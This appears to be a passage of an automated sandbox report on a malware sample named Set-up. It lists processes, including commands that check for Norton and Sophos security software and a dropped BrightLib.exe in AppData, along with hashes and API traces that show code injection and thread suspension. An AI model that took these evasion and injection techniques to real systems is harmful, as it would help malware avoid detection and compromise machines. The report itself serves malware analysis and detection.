                                                                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
                                                                                                                                                Imagebase:0x7ff6b7d00000
                                                                                                                                                File size:289'792 bytes
                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:29
                                                                                                                                                Start time:12:14:11
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:30
                                                                                                                                                Start time:12:14:11
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                                                                                                                                                Imagebase:0x7ff78be20000
                                                                                                                                                File size:106'496 bytes
                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:31
                                                                                                                                                Start time:12:14:11
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:find /I "nswscsvc.exe"
                                                                                                                                                Imagebase:0x7ff69e5f0000
                                                                                                                                                File size:17'920 bytes
                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:32
                                                                                                                                                Start time:12:14:12
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                                                                                                                                                Imagebase:0x7ff6b7d00000
                                                                                                                                                File size:289'792 bytes
                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:33
                                                                                                                                                Start time:12:14:12
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:34
                                                                                                                                                Start time:12:14:12
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                                                                                                                                                Imagebase:0x7ff78be20000
                                                                                                                                                File size:106'496 bytes
                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:35
                                                                                                                                                Start time:12:14:12
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:find /I "sophoshealth.exe"
                                                                                                                                                Imagebase:0x7ff69e5f0000
                                                                                                                                                File size:17'920 bytes
                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:36
                                                                                                                                                Start time:12:14:17
                                                                                                                                                Start date:30/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:846'325'235 bytes
                                                                                                                                                MD5 hash:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:0.8%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:36.2%
                                                                                                                                                  Signature Coverage:24.8%
                                                                                                                                                  Total number of Nodes:254
                                                                                                                                                  Total number of Limit Nodes:25
43c161 69315->69313 69398 43ba82 30 API calls __EH_prolog 69315->69398 69316->69297 69332 43c29f 69316->69332 69347 43c2d1 69316->69347 69400 407095 30 API calls ctype 69316->69400 69318 43c186 69318->69313 69373 452f00 69318->69373 69323->69293 69323->69297 69325 43bef7 69323->69325 69326 43bee9 SysFreeString 69323->69326 69380 4061d7 30 API calls ctype 69325->69380 69326->69297 69329 43bf0a 69331 43bf54 69329->69331 69333 43bf1a 69329->69333 69330 43c28c 69330->69332 69401 40c5e2 VirtualAlloc RaiseException __EH_prolog ctype 69330->69401 69385 402dc9 30 API calls 69331->69385 69332->69347 69402 458220 30 API calls ctype 69332->69402 69381 402dc9 30 API calls 69333->69381 69338 43bf5f 69386 4079d2 31 API calls 69338->69386 69339 43bf25 69382 4079d2 31 API calls 69339->69382 69342 43bf70 69387 4074ba 30 API calls 69342->69387 69343 43bf36 69383 4074ba 30 API calls 69343->69383 69346 43bf7d 69388 4070bb 29 API calls ctype 69346->69388 69347->69297 69403 43ff6e 30 API calls __EH_prolog 69347->69403 69348 43bf43 69384 4070bb 29 API calls ctype 69348->69384 69352 43bf4b 69389 4070bb 29 API calls ctype 69352->69389 69354 43bf91 69355 43bfd2 69354->69355 69356 43bfa9 69354->69356 69391 4070bb 29 API calls ctype 69355->69391 69390 4070bb 29 API calls ctype 69356->69390 69359 43bfae SysFreeString 69359->69297 69360 43bfd7 SysFreeString 69360->69293 69361->69259 69362->69278 69363->69281 69364->69281 69365->69281 69366->69259 69367->69265 69368->69259 69369->69259 69370->69288 69371->69289 69372->69318 69374 452f19 69373->69374 69375 45354b VirtualAlloc 69374->69375 69376 453583 69375->69376 69376->69313 69377->69323 69378->69323 69379->69323 69380->69329 69381->69339 69382->69343 69383->69348 69384->69352 69385->69338 69386->69342 69387->69346 69388->69352 69389->69354 69390->69359 69391->69360 69392->69313 69393->69316 69394->69313 69395->69314 69396->69313 69397->69315 69398->69313 69399->69313 69400->69330 69401->69332 69402->69347 69403->69297
                                                                                                                                                  APIs
                                                                                                                                                  • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 006CE4BA
                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,00000000), ref: 006CE562
                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 006CE8D6
                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 006CE98B
                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 006CE9A8
                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 006CEA4B
                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 006CEA7E
                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 006CEBEF
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Virtual$ProtectSection$CreateView$AllocThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1248616170-0
                                                                                                                                                  • Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                                  • Instruction ID: 2958dca581d42874332fb96406cb6ca6d0b05c2e9a19e032086f2798d70bdd9f
                                                                                                                                                  • Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                                  • Instruction Fuzzy Hash: 8F426871604341AFDB24CF24C844FAABBFAEF88714F14492DF9959B241D772E845CB61

Control-flow Graph (function starting at 680461; rendered graph not reproduced)
                                                                                                                                                  APIs
                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 00680704
                                                                                                                                                  • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 006809F8
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcessTerminateThread
                                                                                                                                                  • String ID: "|/$RjBS$my
                                                                                                                                                  • API String ID: 1197810419-1423027040
                                                                                                                                                  • Opcode ID: df02495dd7b73c105367578076f9cd0b13d243c5a6e8e2831a5ebfb3fbdde46d
                                                                                                                                                  • Instruction ID: c69ba20fe533e08279265e4cd33f42a2cb67308cac4dcc76317fde7cd924f2dc
                                                                                                                                                  • Opcode Fuzzy Hash: df02495dd7b73c105367578076f9cd0b13d243c5a6e8e2831a5ebfb3fbdde46d
                                                                                                                                                  • Instruction Fuzzy Hash: B012C2B4E00218DFEB14DF98C990BADBBB2FF48304F2086A9D515AB385D7356A85CF54

Control-flow Graph (function starting at 680b71; rendered graph not reproduced)
                                                                                                                                                  APIs
                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,006806B7,?,00000001,?,81EC8B55,000000FF), ref: 00680BAF
                                                                                                                                                  • Thread32First.KERNEL32(00000000,0000001C), ref: 00680BDB
                                                                                                                                                  • Wow64SuspendThread.KERNEL32(00000000), ref: 00680C2E
                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00680C58
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1849706056-0
                                                                                                                                                  • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                                  • Instruction ID: 72abda18683505d0fc86204ea39d4b823ef657d00fc1b78507d68f96d65a0f11
                                                                                                                                                  • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                                  • Instruction Fuzzy Hash: 46410CB5A00108AFEB18DF98C490BEDB7B6EF88300F10C168E6159B7A4DA34AE45CB54

Control-flow Graph (function starting at 452ec0; rendered graph not reproduced)
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAlloc.KERNEL32(?,0004F7B0,-80408061,-F246F074,0043C19A,00000001,?,?,?,?,?), ref: 00453557
                                                                                                                                                  Strings
Memory Dump Source
• Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID: ~Xq]
                                                                                                                                                  • API String ID: 4275171209-3958706757
                                                                                                                                                  • Opcode ID: dc22cf1421f3adba9ca020c33df28a80a644fba2fdc0e032cf26d0cf9e2f9fe2
                                                                                                                                                  • Instruction ID: 23b3846dbbdb6520a492e89359c16462791ec603751c17f034bd391237e9687c
                                                                                                                                                  • Opcode Fuzzy Hash: dc22cf1421f3adba9ca020c33df28a80a644fba2fdc0e032cf26d0cf9e2f9fe2
                                                                                                                                                  • Instruction Fuzzy Hash: 2A325A339283208FD748EF7AEC4A1693662FBE0318746823FD846D7156DB38584287CE

Control-flow Graph (function starting at 452f00; rendered graph not reproduced)
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAlloc.KERNEL32(?,0004F7B0,-80408061,-F246F074,0043C19A,00000001,?,?,?,?,?), ref: 00453557
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID: ~Xq]
                                                                                                                                                  • API String ID: 4275171209-3958706757
                                                                                                                                                  • Opcode ID: 5944918900410707abcbb0052d332923433acbd673e6e78fd571fdbb55364c9b
                                                                                                                                                  • Instruction ID: 9859298c637fecb1f15daa030293847af9db440e6c9cbbc6670a331bb4743b03
                                                                                                                                                  • Opcode Fuzzy Hash: 5944918900410707abcbb0052d332923433acbd673e6e78fd571fdbb55364c9b
                                                                                                                                                  • Instruction Fuzzy Hash: 77324B739283208FD748EF7AEC8A1693662FBE0318746923FD846D7156DB38584687CD

                                                                                                                                                  APIs
                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00680AED
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                  • String ID: ,
                                                                                                                                                  • API String ID: 2422867632-3772416878
                                                                                                                                                  • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                                  • Instruction ID: dcf51797f9416d24e4deea40688138960a4ba1719607593ea159c88066950d77
                                                                                                                                                  • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                                  • Instruction Fuzzy Hash: 2141E774A00208EFDB14DF98C994BAEB7B2FF48314F208698D5156B381C771AE85CF94

                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNEL32(00000000,?,?), ref: 006CF131
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                  • String ID: .dll
                                                                                                                                                  • API String ID: 1029625771-2738580789
                                                                                                                                                  • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                  • Instruction ID: 23103d41616cde8422cf5140f4d82fe0692d6aed273fa31e97705a7fab317f79
                                                                                                                                                  • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                  • Instruction Fuzzy Hash: 9521E136600295CFEB21DFA9D854FBA7BA6EF05720F1841BDD8018BB42D730EC468790

                                                                                                                                                  APIs
                                                                                                                                                  • HeapCreate.KERNEL32(00000000,00001000,00000000,0046D3B2,00000001), ref: 0046E5F7
                                                                                                                                                    • Part of subcall function 0046E49E: GetVersionExA.KERNEL32 ref: 0046E4BD
                                                                                                                                                  • HeapDestroy.KERNEL32 ref: 0046E636
                                                                                                                                                    • Part of subcall function 0046E643: HeapAlloc.KERNEL32(00000000,00000140,0046E61F,000003F8), ref: 0046E650
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$AllocCreateDestroyVersion
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2507506473-0
                                                                                                                                                  • Opcode ID: d603912bc11666b8604e5a30b1ee863587e4eb47df06f1985380e2fb4d6e7b3c
                                                                                                                                                  • Instruction ID: 2c44f73e526f15872983c8da3a0ff1853e759ea84cc28b5b3cde1596803d7061
                                                                                                                                                  • Opcode Fuzzy Hash: d603912bc11666b8604e5a30b1ee863587e4eb47df06f1985380e2fb4d6e7b3c
                                                                                                                                                  • Instruction Fuzzy Hash: 84F06D78650301AEEF206B32EC0576A36D8EB74785FA4447BF405C91E1FBA88981D91F

                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 006CDD6B
                                                                                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 006CE0AF
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Virtual$AllocFree
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2087232378-0
                                                                                                                                                  • Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                                                  • Instruction ID: 5df2e5441773848d232c7b1699cd2d9af9eec1b0c14540a6a89445eaf2fbd564
                                                                                                                                                  • Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                                                  • Instruction Fuzzy Hash: 18B1C271600A02ABDB219F608C81FFBB7FAFF19310F14052DE55986241E776E961DBA2

                                                                                                                                                  APIs
                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000,?,00000000,00000000,00000000), ref: 0046C51A
                                                                                                                                                    • Part of subcall function 0046E0EA: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0046FAC9,00000009,00000000,00000000,00000001,0046DF28,00000001,00000074,?,?,00000000,00000001), ref: 0046E127
                                                                                                                                                    • Part of subcall function 0046E0EA: EnterCriticalSection.KERNEL32(?,?,?,0046FAC9,00000009,00000000,00000000,00000001,0046DF28,00000001,00000074,?,?,00000000,00000001), ref: 0046E142
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$AllocateEnterHeapInitialize
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1616793339-0
                                                                                                                                                  • Opcode ID: 771cf43559ff06f1ebc52e5c48213047d5676d2a2eb7c08bb624c5770d819d52
                                                                                                                                                  • Instruction ID: f3a81f82fab732f328402414ab5915954d68b1eb2c82511a8fab8306750961e3
                                                                                                                                                  • Opcode Fuzzy Hash: 771cf43559ff06f1ebc52e5c48213047d5676d2a2eb7c08bb624c5770d819d52
                                                                                                                                                  • Instruction Fuzzy Hash: 6E21BB71A00215ABDB10EF69DC82BBE77A4FB04764F20412BF455EB2D0E77CE941865E
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: !$"$%$%$&$'$($($*$+$,$,$,$,$-$-$-$.$.$.$/$0$1$7$8$8$;$;$;$>$A$B$B$C$C$D$D$D$E$F$G$G$H$M$N$N$O$P$P$R$R$T$V$Y$Y$[$[$[$\$\$]$_$_$`$`$a$b$c$d$d$e$e$g$h$j$k$l$n$n$p$w$|$}$}$~
                                                                                                                                                  • API String ID: 0-2269815469
                                                                                                                                                  • Opcode ID: e45e94bb91484452e74b7a520612be77690e753eeaadf04d74f9b2aa9941fc8d
                                                                                                                                                  • Instruction ID: 669540c889eb5b13069ccdfddba1a0904fa8044e3ae22519e2c8b1136bb67ebb
                                                                                                                                                  • Opcode Fuzzy Hash: e45e94bb91484452e74b7a520612be77690e753eeaadf04d74f9b2aa9941fc8d
                                                                                                                                                  • Instruction Fuzzy Hash: 0A13EF7150C7C08BC7359B3884843AFBBE2AB96320F188A6DE4E9877D2C7798546C757

                                                                                                                                                  Control-flow Graph (graph rendering not preserved; legend: Executed / Not Executed)
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $!$!$#$$$%$%$&$'$'$($)$*$*$+$+$+$,$-$-$.$/$/$/$2$4$4$5$9$;$=$=$?$?$D$D$M$M$N$U$W$^$_$_$_$a$c$c$d$e$j$j$l$n$p$q$r$z${$~
                                                                                                                                                  • API String ID: 0-1920404844
                                                                                                                                                  • Opcode ID: fdad7be40413645a41994a0a0e15cc09c6db28694e98fe9671e9f6630e224268
                                                                                                                                                  • Instruction ID: 591ef4b17c4b656917b376c054e393819602738d01f8921373430e04b0aeb949
                                                                                                                                                  • Opcode Fuzzy Hash: fdad7be40413645a41994a0a0e15cc09c6db28694e98fe9671e9f6630e224268
                                                                                                                                                  • Instruction Fuzzy Hash: 6C2222219087EA8DDB36C63C8C087DDBE615B63324F0843D9D1E96B2D2D7750A86CB66
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004032CE
                                                                                                                                                  • SetFileApisToOEM.KERNEL32 ref: 004032DC
                                                                                                                                                  • GetCommandLineW.KERNEL32(00000004), ref: 004032F9
                                                                                                                                                    • Part of subcall function 00406319: __EH_prolog.LIBCMT ref: 0040631E
                                                                                                                                                    • Part of subcall function 0046BBC0: RaiseException.KERNEL32(?,?,R@,?,?,?,0047D380,?,?,?,004052E0), ref: 0046BBEE
                                                                                                                                                    • Part of subcall function 0040738F: __EH_prolog.LIBCMT ref: 00407394
                                                                                                                                                    • Part of subcall function 00408FB2: __EH_prolog.LIBCMT ref: 00408FB7
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog$ApisCommandExceptionFileLineRaise
                                                                                                                                                  • String ID: Decoding Error$Error:$ : $ file$----------------$Archive Errors: $Archives: $CRC: $Codecs:$Compressed: $Error: $Errors: $Files: $Folders: $Formats:$Size: $Sub items Errors: $WARNING: Cannot find $WARNING: Cannot open $WARNINGS for files:
                                                                                                                                                  • API String ID: 3088770371-689937231
                                                                                                                                                  • Opcode ID: fcb4a9625959cc3be28d0aeddeeac708d92c70676f50eb999fe907713720a31c
                                                                                                                                                  • Instruction ID: 41a247c36ea81c5163d4481a6cebf84b1dcafa3efb08149c349de198b751cea6
                                                                                                                                                  • Opcode Fuzzy Hash: fcb4a9625959cc3be28d0aeddeeac708d92c70676f50eb999fe907713720a31c
                                                                                                                                                  • Instruction Fuzzy Hash: F7A2A070D042199BDF14EBA5C899BEEBBB5AF45308F1040BFE405B72C2DB785A44CB5A

                                                                                                                                                  Control-flow Graph (graph rendering not preserved; legend: Executed / Not Executed)
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 0$0$0$2$2$3$4$4$6$6$8$:$<$<$>$>$Q$`$a$b$d$f$h$j$l$n$s$z${$|$}$~
                                                                                                                                                  • API String ID: 0-876831194
                                                                                                                                                  • Opcode ID: bbe4ec4a255a3f98e1cd5822909672a01be13502a7264827bf40e526fdf13f75
